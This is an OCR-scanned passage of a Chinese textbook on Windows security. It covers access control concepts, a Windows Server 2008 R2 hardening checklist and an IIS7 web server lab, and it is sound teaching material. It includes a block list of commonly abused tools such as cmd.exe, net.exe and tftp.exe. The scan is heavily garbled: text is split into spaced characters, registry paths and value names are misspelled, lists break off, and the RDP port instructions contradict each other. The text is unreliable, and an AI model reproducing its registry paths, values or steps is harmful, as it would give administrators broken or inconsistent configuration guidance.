所 有 者 标识 和 组 标识 记录 了 对 象 所 有 者 用 户 和 用 户 组 的 信息 。 自 主 访问 控制 表 包 含 了 
由 对 象 所 有 者 控制 的 对 象 访问 控制 信息 ; 系统 访问 控制 表 定 义 了 操作 系统 需要 为 其 产生 哪 
种 审计 信息 ,其 内 容 由 系统 安全 管理 用 户 控制 。 

4. 本 地 安全 授权 机 构 

本 地 安全 授权 机 构 (local security authority) 是 Windows 安全 子 系统 的 核心 。 它 依据 
安全 账号 管理 器 中 的 数据 处 理 用 户 登录 信息 ; 并 且 还 有 控制 审计 日 志 的 工作 。 

5. 访问 令 牌 

对 于 登录 的 用 户 , 本 地 安全 授权 机 构 在 验证 其 成 功 登 录 后 为 其 创建 一 个 访问 令 牌 。 该 
令 牌 标识 用 户 身份 .组 别 等 信息 ,用 户 进行 资源 访问 的 行为 都 会 依据 令 牌 来 判断 其 身份 .组 
别 。 用 户 的 SID 号 在 系统 中 是 不 变 的 ,但 是 访问 令 牌 每 次 登录 都 可 能 会 不 同 。 

6. 安全 引用 监视 器 

安全 引用 监视 器 (Security Reference Monitor,SRM) 是 访问 监控 器 在 Windows 系统 中 
的 实现 ,用 以 检测 各 种 访问 操作 合法 性 。 


12.3.2 Windows 系统 的 访问 控制 


一 个 用 户 被 创建 后 ,系统 为 其 分 配 SID 号 ,并 将 其 信息 存 人 SAM 数据 库 。 

每 次 用 户 登录 时 ,操作 系统 把 用 户 输入 的 用 户 名 ,口令 传输 给 安全 账号 管理 器 ,安全 账 
号 管理 器 将 这 些 数据 同 SAM 数据 库 内 容 进行 对 比 ,验证 用 户 是 否 可 以 成 功 登 录 。 如 果 用 
户 成 功 登 录 , 安 全 账号 管理 器 将 返回 用 户 所 在 组 的 安全 标识 ,并 生成 用 户 进 程 。 

本 地 安全 授权 机 构 为 用 户 创建 访问 令 牌 ,标明 用 户 名 、SID、 所 在 组 等 信息 ,然后 ,用 户 
开启 的 新 进程 都 将 复制 用 户 进程 的 令 牌 作为 该 进程 的 访问 令 牌 。 

每 当 用 户 要 访问 某 个 对 象 时 ,将 由 安全 引用 监视 器 查看 用 户 进程 的 访问 令 牌 ,把 它 与 被 
访问 对 象 的 安全 描述 符 中 的 自主 访问 控制 表 中 的 内 容 进行 对 比 ,判断 用 户 是 否 有 权 访问 
对 象 。 

在 Windows 系统 中 对 象 的 访问 权限 是 在 其 安全 描述 符 中 定义 的 。Windows 的 权限 管 
理 是 采用 基于 角色 的 访问 控制 方式 ,用 户 组 就 是 用 户 的 角色 。 仅 当 资 源 所 在 磁盘 分 区 为 
NTFS 格式 时 , 才 可 以 为 资源 设置 用 户 访问 权限 。 

另外 ,用 户 可 能 属于 多 个 用 户 ( 即 拥有 多 个 角色 ) ,对 同一 个 资源 对 象 ,每 个 组 的 访问 权 
限 可 能 会 不 同 。 当 此 种 情况 发 生 时 ,如 何 判断 用 户 的 资源 访问 权限 将 会 是 一 个 问题 。 下 面 
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介绍 一 些 权限 管理 原则 。 

(1) 拒绝 优 于 允许 原则 。 例 如 , 某 个 用 户 属于 两 个 用 户 组 ,一 个 组 对 某 个 文件 夹 有 读 取 
权限 ,另外 一 个 则 被 拒绝 访问 ,那么 对 于 此 文件 夹 该 用 户 无 法 访问 。 

(2) 累加 原则 。 例 如 , 某 用 户 的 两 个 组 ,一 个 对 资源 有 读 取 权限 , 另 一 个 有 写 人 权限 。 
那么 该 用 户 对 资源 既 可 以 读 ,又 可 以 写 。 

(3) 权限 继承 原则 。 一 个 文件 被 定义 了 用 户 访问 权限 , 它 的 子 文件 夹 自动 继承 它 的 用 
户 访 问 权 限 。 


12.4 Windows Server 系统 安全 配置 


主体 对 客体 的 访问 控制 是 操作 系统 最 基本 、 最 常见 的 安全 机 制 。 但 现代 操作 系统 都 非 
常 复 杂 ,与 系统 安全 相关 的 配置 有 很 多 。Windows Server 是 微软 推出 的 Windows 的 服务 
器 操作 系统 ,其 核心 是 Windows Server System(WSS) ,每 个 Windows Server 都 与 其 家 用 
(工作 站 ) 版 对 应 。 下 面 以 Windows Server 2008 R2 为 例 介 绍 常规 安全 设置 及 基本 安全 
策略 。 

1. 目录 权限 

除 系统 所 在 分 区 外 的 所 有 分 区 都 赋予 Administrators 和 SYSTEM 有 完全 控制 权 , 然 
后 再 对 其 下 的 子 目录 做 单独 的 目录 权限 。 

2. 远程 连接 

我 的 电脑 属性 一 远程 设置 一 远程 一 只 允许 运行 带 网 络 超级 身份 验证 的 远程 桌面 的 计算 
机 连接 ,选择 允许 运行 任意 版 本 远程 桌面 的 计算 机 连接 ( 较 不 安全 )。 备 注 ; 方便 多 种 版 本 
Windows 远程 管理 服务 器 。Windows Server 2008 的 远程 桌面 连接 与 Windows Server 
2003 相 比 ,引入 了 网 络 级 身份 验证 (Network Level Authentication, NLA)。Windows 7 和 
Windows 10 系统 均 支 持 网 络 身份 认证 。 

3. 修改 远程 访问 服务 端口 

更 改 远 程 连接 端口 方法 ,可 用 Windows 自 带 的 计算 器 将 十 进 制 转 为 十 六 进 制 。 更改 
3389 端口 为 8208 ,重启 生效 。 


Windows Registry Editor Version 5.00 

[HKEY_LOCAL MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] 
"PortNumber" = dword:0002010 

[HKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] 
"PortNumber" = dword:00002010 


(1) 选择 “开始 ”>“ 运 行 "命令 ,输入 “regedit”, 进 入 注册 表 编 辑 , 按 下 面 的 路 径 进 入 修 
改 端口 的 地 方 。 


HEEY_LOCAL MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\ RDP-Tcp 
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(2) 找到 右 侧 的 "PortrNumber" ,用 十 进 制 方式 显示 ,默认 端口 为 3389, 改 为 6666 端口 : 


HKEY_LOCRL MACHINE\System\CurrentControlSet\Control\Terminal Server\Wds\ rdpwd\Tds\tcp 


(3) 找到 右 侧 的 " PortNumber", 用 十 进 制 方式 显示 ,默认 端口 为 3389, 改 为 同上 的 
端口 。 
(4) 选择 “控制 面板 ”>“Windows 防火 墙 ? 一 “高 级 设置 ”一 “和 站 规则 ”新建 规则 ” 


(5) 选择 “端口 ”~* 协 议和 端口 ”~TCP/ 特 定 本 地 端口 : 同上 的 端口 。 
(6) 单 击 “下 一 步 ?按钮 ,选择 “允许 连接 ?选项 。 
(7) 单 击 “ 下 一 步 ”按钮 ,选择 “公用 ”选项 。 
(8) 单 击 “下 一 步 " 按 钮 ,名称 为 “远程 桌面 -新 (TCP-In)”, 描 述 为 “用 于 远程 桌面 服务 的 
入 站 规则 ,以 允许 RDP 通信 ”。 

(9) 删除 远程 桌面 (TCP-In) 规 则 。 

(10) 重新 启动 计算 机 。 

4. 配置 本 地 连接 

选择 “网 络 ”>“ 属 性 ”一 “管理 网 络 连 接 ” 一 “本 地 连接 "命令 ,打开 “本 地 连接 ”界面 ,选择 
“属性 ?选项 卡 , 单 击 *Microsoft 网 络 客户 端 ? 图 标 ,再 单 击 “ 伯 载 ”按钮 ,在 弹出 的 对 话 框 中 单 
击 * 是 ?按钮 卸载 。 单 击 *Microsoft 网 络 的 文件 和 打印 机 共享 "图 标 ,再 单 击 * 印 载 ”按钮 ,在 
弹出 的 对 话 框 中 单 击 “ 是 ”按钮 卸载 。 

解除 Netbios 和 TCP/IP 协议 的 绑 定 139 端口 : 打开 “本 地 连接 ”界面 ,选择 “属性 ”选项 
卡 ,在 弹出 的 “属性 ” 框 中 双击 “Internet 协议 版 本 (TCP/IPV4)”, 选 择 “ 属 性 ”一 “高 级 ”一 
“WINS" 一 “禁用 TCP/IP 上 的 NETBIOS” 选 项 , 单 击 “ 确 认 ” 按 钮 关闭 本 地 连接 属性 。 

禁止 默认 共享 : 单 击 “ 开 始 ” 一 “运行 "命令 ,在 命令 行 中 输入 “Regedit”, 打 开 “ 注 册 表 ” 
编辑 器 , 打开 注册 表 项 “HKEY_LOCAL_MACHINEASYSTEMA CurrentControlSet \ 
Services\lanmanserver\parameters”, 在 右边 的 窗口 中 新 建 Dword 值 , 名 称 设 为 AutoShareServer, 值 
设 为 “0”。 

关闭 445 端口 : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ 
NetBT\ Parameters ,新 建 Dword(32 位 ) 名 称 设 为 SMBDeviceEnabled, 值 设 为 “0”。 

5. 共享 和 发 现 

在 “网 络 ” 选 项 上 布 击 , 选 择 “ 属 性 ”选项 ,打开 “网 络 和 共享 中 心 ” 窗 口 ,选择 “共享 和 发 
现 ” 命 令 ,根据 需要 选择 “关闭 “网络 共享 文件 共享 公用 文件 共享 打印 机 共享 “显示 
我 正在 共享 的 所 有 文件 和 文件 夹 ” 或 “显示 这 台 计 算 机 上 所 有 共享 的 网 络 文 件 夹 ” 选 项 。 

6. 用 防火 墙 限制 Ping 

首先 打开 该 系统 的 “开始 ”菜单 ,从 中 依次 选择 “程序 ”>“ 管 理工 具 ” 一 “服务 器 管理 器 ” 
选项 ,在 弹出 的 “服务 器 管理 器 "窗口 中 ,依次 展开 左 侧 显 示 区 域 中 的 “配置 ”/“ 高 级 安全 
Windows 防火 墙 ? 中 的 选项 ,进入 Windows Server 2008 服务 器 系统 的 防火 墙 高 级 安全 设置 
窗口 。 
其 次 从 该 设置 窗口 中 找到 “查看 和 创建 防火 墙 规则 ”设置 项 ,选择 该 设置 项 下 面 的 “入 站 
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规则 ”选项 ,在 右 侧 操作 列表 中 ,选择 “新 规则 ”选项 ,进入 “防火 墙 高 级 安全 规则 创建 向 导 ” 窗 
口 , 当 向 导 窗 口 提 示 用 户 选 择 创建 类 型 时 ,可 以 先 选 择 “ 自 定义 ”选项 , 单 击 “ 下 一 步 ” 按 钮 。 

然后 向 导 窗 口 会 提示 用 户 该 规则 应 用 于 所 有 程序 还 是 特定 程序 ,此 时 可 以 选择 “所 有 程 
序 ”" 选 项 ,继续 单 击 “ 下 一 步 ” 按 钮 ,打开 向 导 设置 界面 ,选择 其 中 的 “ICMPv4” 选 项 , 青 单 击 
“下 一 步 ” 按 钮 ,然后 将 此 规则 设置 为 匹配 本 地 的 “任何 IP 地 址 ”及 远程 的 “任何 IP 地 址 ”, 青 
将 连接 条 件 参 数 设置 为 “阻止 连接 ”, 最 后 依照 向 导 提示 设置 好 适用 该 规则 的 具体 网 络 环境 ， 


为 安全 规则 命名 ,完成 后 重新 启动 计算 机 。 
7. 防火 墙 的 设置 


选择 “控制 面板 ”>“Windows 防火 墙 设 置 ? 一 “更 改 设 置 ? 一 例外 ?选项 ,选中 “FTP? 


“HTTP”“ 远 程 桌 面 服务 一 核心 网 络 " 复 选 框 。HTTPS 用 不 到 可 以 不 选中 。 
8. 禁用 不 需要 的 和 危险 的 服务 
以 下 列 出 服务 都 需要 禁用 。 
(1) 控制 面板 .管理 工具 、 服 务 。 


(2 
(3 


ww 避 


Distributed linktracking client 用 于 局 域 网 更 新 连接 信息 。 
PrintSpooler 打印 服务 。 


(4) Remote Registry 远程 修改 注册 表 。 


(5 


Server 计算 机 通过 网 络 的 文件 .打印 和 命名 管道 共享 。 


(6) TCP/IP NetBIOS Helper 提供 。 
(7) TCP/IP (NetBT) 服 务 上 的 。 


(8 
(9 


NetBIOS 和 网 络 上 客户 端的 。 
NetBIOS 名 称 解析 的 支持 。 


(10) Workstation 泄露 系统 用 户 名 列表 与 Terminal Services Configuration 关联 。 
(11) Computer Browser 维护 网 络 计算 机 更 新 (默认 已 经 禁用 ) 。 
(12) Net Logon 域 控制 器 通道 管理 (默认 已 经 手动 ) 。 


(13) Remote Procedure Call (RPC) Locator RpceNs* 远程 过 程 调用 (RPC) (默认 已 经 


手动 删除 服务 sc delete MySql)。 
9. 安全 设置 一 本 地 策略 一 安全 选项 
在 运行 中 输入 “gpedit. msc” 后 按 Enter 键 ,打开 “组 策略 编辑 器 ”, 选 择 “ 计 算 机 配置 ”一 
“Windows 设置 ">“ 安 全 设置 ”>“ 本 地 策略 ”>“ 安 全 选项 ”选项 。 
交互 式 登录 : 不 显示 最 后 的 用 户 名 一 启用 。 
不 允许 SAM 账户 的 匿名 枚 举 一 启 用 。 
不 允许 SAM 账户 和 共享 的 匿名 枚 举 一 启用 。 
不 允许 储存 网 络 身份 验证 的 凭据 一 启用 。 


网 络 访问 : 
网 络 访问 : 
网 络 访问 : 
网 络 访问 : 
网 络 访问 : 
网 络 访问 : 
网 络 访问 : 


| 


| 


可 


可 匿名 访问 的 共享 一 内 容 全 部 删除 。 


[匿名 访问 的 命名 管道 一 内 容 全 部 删除 。 


可 远程 访问 的 注册 表 路 径 一 内 容 全 部 删除 。 


[远程 访问 的 注册 表 路 径 和 子路 径 一 内 容 全 部 删除 。 


账户 : 重 命名 来 宾 账 户 一 这 里 可 以 更 改 guest 账号 。 
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账户 : 重 命名 系统 管理 员 账 户 一 这 里 可 以 更 改 Administrator 账号 。 

10. 安全 设置 一 账户 策略 一 账户 锁定 策略 

在 运行 栏 中 输入 “gpedit msc” 后 按 Enter 键 ,打开 “组 策略 编辑 器 ”, 选 择 “ 计 算 机 配置 ”一 
“Windows 设置 ”>“ 安 全 设置 "一 “账户 策略 ”>“ 账 户 锁 定 策略 ”选项 ,将 账户 锁定 阅 值 设置 
为 “三 次 登录 无 效 ”“ 锁 定时 间 为 30 分 钟 “ 复 位 锁定 计数 设 为 30 分 钟 ”。 

11. 本 地 安全 设置 

选择 “计算 机 配置 ">“Windows 设置 ”>“ 安 全 设置 ">“ 本 地 策略 ”一 “用 户 权 限 分 配 ” 
命令 。 关 闭 系统 : 只 有 Administrators 组 、 其 他 全 部 删除 。 通 过 终端 服务 拒绝 登录 : 加 入 
Guests 组 ,IUSR_ xxxxx ,TWAM _ xxxxx .NETWORK SERVICE 、 SQLDebugger。 通 过 终 
端 服务 允许 登录 : 加 入 Administrators、Remote Desktop Users 组 ,其 他 全 部 删除 。 

12. 更 改 Administrator,guest 账户 ,新建 一 无 任何 权限 的 假 Administrator 账户 

选择 “管理 工具 ”>“ 计 算 机 管理 ”>“ 系 统 工具 ”>“ 本 地 用 户 和 组 ”一 “用户” 命令, 在 打 
开 的 界面 中 ,新 建 一 个 Administrator 账户 作为 陷阱 账户 ,设置 超 长 密码 ,并 去 掉 所 有 用 户 
组 。 更 改 描 述 为 “管理 计算 机 ( 域 ) 的 内 置 账户 ”。 

13. 密码 策略 

选择 “计算 机 配置 ”>“Windows 设置 >“ 安全 设置 "一 “密码 策略 "命令, 单 击 “ 启 动 ” 按 
钮 。 密 码 必须 符合 复杂 性 要 求 最 短 密码 长 度 。 

14. 禁用 DCOM (“冲击 波 " 病 毒 RPC/DCOM 漏洞 ) 

运行 Decomcnfg. exe。 选 择 “ 控 制 台 根 节点 ”一 “组 件 服务 ”一 计算 机 命令 ,并 在 “我 的 电 
脑 *" 图 标 上 右 击 ,选择 “属性 ”选项 ,选择 “默认 属性 ”选项 卡 取消 选中 “在 这 台 计 算 机 上 启用 分 
布 式 COM" 复 选 框 。 

15.ASP 漏洞 

ASP 漏洞 主要 是 检查 卸载 WScript. Shell 和 Shell. application 组 件 ,是 否 有 必要 。 如 果 
确实 要 使 用 ,或 者 也 可 以 给 它们 重新 命名 。WScript. Shell 可 以 调用 系统 内 核 运行 DOS 基 
本 命令 。 可 以 通过 修改 注册 表 , 将 此 组 件 重 新 命名 ,来 防止 此 类 木马 的 危害 。HKEY_ 
CLASSES_ROOTAWScript. Shell\ 及 HKEY_CLASSES_ROOT\ WScript. Shell. 1\。 命 名 
为 其 他 的 名 称 , 如 为 WScript. Shell_ChangeName 或 WScript. Shell. 1 ChangeName。 以 后 
调用 时 使 用 这 个 就 可 以 正常 调用 此 组 件 了 。 

要 将 clsid 值 重新 设置 。HKEY_CLASSES_ROOT\WScript. Shell\CLSID\ 项 目的 值 。 
HKEY_CLASSES_ROOT\WScript. Shell. 1\CLSID\ 项 目的 值 。 也 可 以 将 其 删除 ,来 防止 
此 类 木马 的 危害 。Shell. Application 可 以 调用 系统 内 核 运行 DOS 基本 命令 。 可 以 通过 修 
改 注册 表 , 将 此 组 件 重 命名 ,来 防止 此 类 木马 的 危害 。HKEY_CLASSES_ROOT\Shell. 
Application\ 及 HKEY_CLASSES_ROOT\ Shell. Application. 1\ 命 名 为 其 他 的 名 称 , 如 命 
名 为 Shell. Application_ChangeName 或 Shell. Application. 1 _ChangeName。 以 后 调用 时 
使 用 这 个 就 可 以 正常 调用 此 组 件 了 。 

要 将 clsid 值 重 新 设置 。HKEY_CLASSES_ROOT\Shell. Application\CLSID\ 项 目的 
值 。HKEY_CLASSES_ROOT\Shell. Application\CLSID\ 项 目的 值 。 也 可 以 将 其 删除 ,来 
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防止 此 类 木马 的 危害 。 

禁止 Guest 用 户 使 用 shell32. dll 来 防止 调用 此 组 件 。Windows 2000 使 用 命令 : cacls 
C:\ WINNT\system32\ shell32. dll /e /d guests。Windows 2003 使 用 命令 : cacls C:\ 
WINDOWS\system32\shell32. dll /e /d guests。 

禁止 使 用 FileSystemObject 组 件 ,FSO 是 使 用 率 非常 高 的 组 件 ,要 注意 是 否 印 载 。 重 命 
名 后 调用 就 要 修改 程序 了 ,Set FSO 〇 二 Server. CreateObject ("Scripting. FileSystemObject")。 
FileSystemObject 可 以 对 文件 进行 常规 操作 ,可 以 通过 修改 注册 表 , 将 此 组 件 重 命名 ,来 防 
止 此 类 木马 的 危害 。HKEY_CLASSES_ROOT\ Scripting. FileSystemObject\。 重 命名 为 
其 他 的 名 称 , 如 重 命名 为 FileSystemObject_ChangeName 。 以 后 调用 时 使 用 这 个 就 可 以 正 
常 调用 此 组 件 了 。 

要 将 clsid 值 重 新 设置 。HKEY _CLASSES_ROOT\ Scripting. FileSystemObject \ 
CLSID\ 项 目的 值 。 也 可 以 将 其 删除 ,来 防止 此 类 木马 的 危害 。 注 销 此 组 件 命 令 : RegSrv32 
/uC:\WINDOWS\SYSTEM\scrrun. dll。 如 何 禁 止 Guest 用 户 使 用 scrrun. dll 来 防止 调 
用 此 组 件 , 可 以 使 用 命令 为 : cacls C:\WINNT\system32\scrrun. dll /e /d guests。 

16. 打开 UAC 

选择 “控制 面板 ”>“ 用 户 账户 ”>“ 打 开 或 关闭 用 户 账户 控制 "选项 , 即 可 打开 UAC。 

17. 程序 权限 


nn mn mn mn mn nn 
» 


"net. exe"," net1. exe cmd. exe"," tftp. exe"," netstat. exe"," regedit. exe 
exe", "attrib. exe" , "cacls. exe" , "format. com", "c. exe" 或 完全 禁止 上 述 命令 的 执行 。 

在 命令 行 输入 gpedit. msc 命令 , 按 Enter 键 ,选择 “用 户 配置 "~~”“ 管 理 模板 ”~~“ 系 统 ” 
选项 ,启用 阻止 访问 命令 提示 符 。 同 时 , 停 用 命令 提示 符 脚本 处 理 ,启用 阻止 访问 注册 表 编 
辑 工具 ,启用 不 要 运行 指定 的 Windows 应 用 程序 ,添加 下 面 的 at. exe attrib. exe c. exe 
cacls. exe cmd. exe format. com net. exe net1. exe netstat. exe regedit. exe tftp. exe。 

18. Serv-u 安全 问题 

安装 程序 尽量 采用 最 新 版 本 ,避免 采用 默认 安装 目录 ,设置 好 Serv-u 目录 所 在 的 权限 
后 ,设置 一 个 复杂 的 管理 员 密 码 。 修 改 Serv-u 的 banner 信息 ,设置 被 动 模式 端口 范围 
(4001 一 4003) 在 本 地 服务 器 设置 中 做 好 相关 安全 设置 ,包括 检查 匿名 密码 .禁用 反超 时 调 
度 .拦截 "FTP bounce” 攻 击 和 FXP, 对 于 在 30 秒 内 连接 超过 3 次 的 用 户 拦截 10 分 钟 。 域 
中 的 设置 为 ,要 求 复杂 密码 ,目录 只 使 用 小 写字 母 ,高 级 中 设置 取消 允许 使 用 MDTM 命令 
更 改 文 件 的 日 期 。 

更 改 Serv-u 的 启动 用 户 : 在 系统 中 新 建 一 个 用 户 ,设置 一 个 复杂 的 密码 ,不 属于 任何 
组 。 将 Servu 的 安装 目录 给 予 该 用 户 完全 控制 权限 。 建 立 一 个 FTP 根 目录 ,需要 给 予 这 个 
用 户 该 目录 完全 控制 权限 ,因为 所 有 的 ftp 用 户 上 传 . 删 除 、 更 改 文件 都 是 继承 了 该 用 户 的 
权限 ,和 否则 无 法 操作 文件 。 另 外 需要 给 该 目录 以 上 的 上 级 目录 用 户 读 取 权 限 ,否则 会 在 连接 
时 出 现 530 Not logged in，home directory does not exist。 例 如 ,在 测试 时 FTP 根 目 录 为 
d:soft, 必 须 给 D 盘 该 用 户 的 读 取 权 限 ,为 了 安全 取消 D 盘 其 他 文件 夹 的 继承 权限 。 而 一 般 
的 使 用 默认 的 System 启动 就 没有 这 些 问题 ,因为 System 一 般 都 拥有 这 些 权 限 。 如 果 FTP 
不 是 必须 每 天 都 用 ,可 以 关闭 ,使 用 时 再 打开 。 


at. 
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19. 其 他 补充 


(1) 新 做 系统 一 定 要 先 安装 上 已 知 补丁 ,以 后 也 要 及 时 关注 微软 的 漏洞 报告 。 

(2) 所 有 盘 符 根 目 录 只 给 System 和 Administrator 的 权限 ,其 他 的 删除 。 

(3) 将 所 有 磁盘 格式 转换 为 NTFS 格式 。 

(4) 开启 Windows Web Server 2008 R2 自 带 的 高 级 防火 墙 , 默 认 已 经 开启 。 

(5) 安装 必要 的 杀毒 软件 ,如 mcafee, 安 装 一 款 ARP 防火 墙 。 

(6) 设置 屏幕 保护 。 

(7) 关闭 光盘 和 磁盘 的 自动 播放 功能 。 

(8) 删除 系统 默认 共享 。 命 令 为 “net share c$ /del”。 这 种 方式 下 次 启动 后 还 是 会 出 
现 , 不 彻底 。 也 可 以 做 成 一 个 批 处 理 文件 ,然后 设置 开机 自动 执行 这 个 批 处 理 。 但 是 还 是 推 
荐 下 面 的 方法 ,直接 修改 注册 表 的 方法 。 

HKEY_LOCAL MACHINE\SYSTEM\CurrentControlSet\Services\Lanmanserver\ 
parameters 下 面 新 建 AutoShareServer, 值 设置 为 0 。 重 新 启动 ,测试 。 已 经 永久 生效 了 。 

(9) 重 命名 Administrator 和 Guest 账户 ,密码 必须 复杂 。 
0) 创建 一 个 陷阱 用 户 Administrator, 权 限 最 低 。 
(11) 选择 “本 地 策略 >“ 用 户 权限 分 配 ” 命 令 。 关 闭 系统 。 只 有 Administrators 组 ,其 
他 的 全 部 删除 。 选 择 “ 管 理 模 板 ”>“ 系 统 " 命 令 。 显 示 “ 关 闭 事件 跟踪 程序 ”更 改 为 已 禁用 。 
(12) 选择 “本 地 策略 ”>“ 安 全 选项 ”命令 。 交 互 式 登 录 , 不 显示 最 后 的 用 户 名 一 启用 ; 
网 络 访问 ,不 允许 SAM 账户 和 共享 的 匿名 枚 举 一 启 用 ; 网 络 访问 ,不 允许 存储 网 络 身 份 验 
证 的 凭据 或 . NET Passports 一 启用 ; 网 络 访问 ,可 远程 访问 的 注册 表 路 径 一 全 部 删除 ; 网 
络 访问 ,可 远程 访问 的 注册 表 路 径 和 子路 径 一 全 部 删除 。 
(13) 禁止 dump file 的 产生 。 选 择 “ 系 统 属性 ”一 “高 级 ”一 “启动 和 故障 恢复 ”命令 ,将 
“ 写 人 调试 信息 ”修改 为 “无 ”。 
(14) 禁用 不 必要 的 服务 。 包 括 TCP/IP NetBIOS Helper、 Server、 Distributed Link 
Tracking Client Print Spooler、Remote Registry、Workstation 。 

(15) 站 点 文件 夹 安全 属性 设置 。 禁 用 或 删除 默认 站 点 。 一 般 给 站 点 目录 权限 设置 为 ， 
System 一 完全 控制 Administrator 一 完全 控制 ; Users 一 读 ; IIS_Iusrs 一 读 、 写 。 


《ED Wen 服务 器 的 安全 配置 


一 


/ 实 训 目的 
基于 Windows Server 2008 下 使 用 IIS7 部 署 的 Web 服务 器 ,对 IIS7 的 各 项 安全 配置 
进行 分 析 , 以 掌握 基于 此 环境 下 的 Web 服务 器 的 安全 性 。 


V 实 训 丙 客 

JS7 部 署 的 WEB 服务 器 安全 配置 。 
/ 实 训 设备 

1. 硬件 : 联网 计算 机 。 
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2. 软件 : Windows Server 2008 R2 。 


A/ 实 训 步 村 

1. 磁盘 及 文件 夹 设置 

为 提高 系统 中 数据 的 安全 性 ,服务 器 文件 格式 一 律 为 NTFS 格式 ,这 样 可 以 更 好 地 配 
置 磁盘 的 各 种 访问 权限 。 一 般 情况 下 ,各 个 分 区 都 只 赋予 Administrators 和 System 权限 ， 
删除 其 他 用 户 的 访问 权限 ,以 保证 拒绝 任何 未 授权 用 户 的 访问 。 

2. 为 站 点 建立 相应 的 用 户 

每 个 站 点 都 使 用 专门 建立 的 用 户 来 进行 权限 分 配 , 可 以 保证 各 个 站 点 之 间 是 独立 的 ,被 
隔离 开 的 ,不 会 互相 影响 的 。 

此 类 用 户 包 含 为 站 点 建立 用 于 匿名 访问 的 用 户 和 为 用 于 应 用 程序 池 运 行 的 用 户 。 匿 名 
访问 用 户 属于 GUEST 组 ,应 用 程序 池 运 行 用 户 属于 IIS_IUSRS 组 。 

操作 方法 为 : 在 “我 的 电脑 "图标 上 右 击 ,选择 “管理 ”选项 ,在 打开 的 “本 地 用 户 和 组 ” 窗 
格 中 的 用户” 图 标 上 右 击 ,选择 “新 用 户 ” 选 项 。 在 打开 的 “新 用 户 ” 对 话 框 中 ,设置 “用 户 名 ” 
“密码 ”并 选中 “用 户 不 能 更 改 密码 “密码 永 不 过 期 " 复 选 框 ,然后 单 击 “ 确 定 ” 按 钮 。 

选择 创建 好 的 用 户 并 右 击 ,在 弹出 的 快捷 菜单 中 选择 “属性 ”选项 ,设置 用 户 到 相应 的 组 
即 可 。 

3. 站 点 使 用 独立 的 应 用 程序 池 

每 个 站 点 使 用 的 应 用 程序 池 应 该 是 独立 的 ,以 便 资源 的 合理 分 配 ,并 且 都 以 独立 的 标识 
账户 运行 ,在 出 现 异常 情况 时 也 不 会 互相 影响 。 

操作 方法 如 下 。 

(1) 打开 “IIS 信息 服务 管理 器 ” ,在 “应 用 程序 池 ” 图 标 上 右 击 ,选择 “新 建 应 用 程序 池 ” 
选项 ,输入 名 称 , 单 击 “ 确 定 ” 按 钮 。 

(2) 单 击 此 应 用 程序 池 , 在 操作 栏 中 选择 “高 级 设置 "选项 ,将 “进程 模型 标识 ”选择 为 之 
前 创建 的 应 用 程序 池 运 行 用 户 。 

(3) 单 击 需 要 配置 的 网 站 ,在 操作 栏 中 选择 “高 级 设置 ”选项 ,应 用 程序 池 选 择 为 上 一 步 
创建 的 应 用 程序 池 。 

4. 启用 匿名 身份 验证 

网 站 目录 下 所 有 文件 启用 匿名 身份 验证 ,便于 用 户 可 以 匿名 访问 网 站 ,并 将 之 前 建立 的 
用 户 分 配 到 该 网 站 。 

操作 方法 如 下 。 

(1) 在 功能 视图 中 双击 “身份 验证 ”, 右 击 “ 匿 名 身份 验证 ”, 选 择 “ 启 用 ”选项 。 

(2) 单 击 该 网 站 ,在 功能 视图 中 双击 “身份 验证 ”, 右 击 * 匿 名 身份 验证 ?选项 ,选择 “ 编 
辑 ”" 匿 名 身份 验证 ,并 选择 “匿名 用 户 标识 ”为 之 前 建立 的 用 于 匿名 访问 的 用 户 。 

注意 : 需要 赋予 该 匿名 用 户 对 此 网 站 目录 及 文件 相应 的 访问 权限 。 

5. 启用 基本 身份 验证 

为 保护 指定 目录 不 被 匿名 用 户 访 问 ,需要 启用 基本 身份 验证 ,此 项 需要 关闭 指定 目录 的 
匿名 用 户 访问 权限 。 
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操作 方法 如 下 。 

(1) 在 功能 视图 中 双击 “身份 验证 ”, 右 击 “ 匿 名 身份 验证 ”, 选 择 “ 禁 用 ”匿名 身份 验证 。 

(2) 在 功能 视图 中 双击 “身份 验证 ”, 右 击 “ 基 本 身份 验证 ”, 选 择 “ 启 用 ”并 编辑 基本 身份 
验证 ,为 基本 身份 认证 配置 拥有 访问 权限 的 用 户 。 

6. 取消 上 传 目 录 的 执行 权限 

网 站 程序 正常 运行 所 需 的 权限 并 不 是 完全 一 样 的 ,可 以 在 IIS 中 对 网 站 目录 进行 设置 ， 
一 般 目录 设置 为 读 取 ,满足 访问 、 浏 览 即 可 ; 需要 上 传 文件 的 目录 ,在 设置 了 写 人 权限 后 ,可 
以 将 目录 的 执行 权限 去 掉 。 这 样 即使 上 传 了 木马 文件 在 此 目录 ,也 是 无 法 执行 的 。 

操作 方法 为 : 选中 网 站 的 上 传 文件 夹 ,选择 “处 理 程序 映射 ">“ 编 辑 功能 权限 ”命令 , 取 
消 脚 本 和 执行 功能 。 

7. 基于 IP 地 址 或 域名 授予 访问 权限 和 拒绝 访问 

在 IIS7 中 ,默认 情况 下 所 有 Internet 协议 (IP) 地 址 .计算 机 和 域 都 可 以 访问 用 户 的 站 
点 。 为 了 增强 安全 性 ,可 以 创建 向 所 有 IP 地 址 (默认 设置 ) ,特定 IP 地 址 ,IP 地 址 范围 或 特 
定 域 授 予 访问 权限 的 允许 规则 ,以 此 来 限制 对 站 点 的 访问 。 

在 “功能 视图 ”中 ,双击 “IPv4 地 址 和 域 限制 ”。 

在 “操作 ” 窗 格 中 , 单 击 “ 添 加 允许 条 目 ” 按 钮 。 

在 “添加 允许 限制 规则 ”对 话 框 中 ,选择 “特定 IPv4 地 址 ”IPv4 地 址 范围 ”或 “域名 ” 选 
项 ,然后 添加 IPv4 地 址 、 范 围 . 掩 码 或 域名 ,然后 单 击 “ 确 定 ” 按 钮 。 

8. 配置 URL 授权 规则 

可 以 允许 或 拒绝 特定 计算 机 、 计 算 机 组 或 域 访问 服务 器 上 的 站 点 ,应 用 程序 .目录 或 文 
件 。 通 过 配置 URL 授权 规则 ,可 以 配置 为 指定 组 的 成 员 访 问 受 限 内 容 。 

操作 方法 如 下 。 

